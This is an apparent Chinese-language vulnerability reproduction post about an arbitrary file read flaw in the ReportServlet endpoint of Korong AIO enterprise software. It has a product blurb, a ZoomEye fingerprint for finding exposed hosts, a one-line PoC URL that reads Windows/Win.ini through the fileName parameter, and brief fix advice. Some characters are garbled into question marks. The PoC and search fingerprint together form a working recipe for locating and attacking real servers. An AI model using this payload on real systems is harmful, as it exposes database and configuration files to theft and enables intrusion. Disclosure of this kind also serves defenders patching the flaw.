科荣 AIO ReportServlet 任意文件读取漏洞复现

0x01 产品简介

科荣AIO 企业?体化管理解决?案 通过ERPERP（进销存财务）、OAOA（办公?动化）、CRMCRM（客?关系管理）、UDPUDP（?定义平台），集电?商务平台、?付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客?在管理过程中跨部?、多功能、需求多变等通?及个性化的问题。

0x02 漏洞概述

科荣AIO ReportServlet 接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

钟馗之眼："changeAccount('8000')"

0x04 漏洞复现

PoC

http://your-ip/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini

0x05 修复建议?

关闭互联网暴露面或接口设置访问权限

升级至安全版本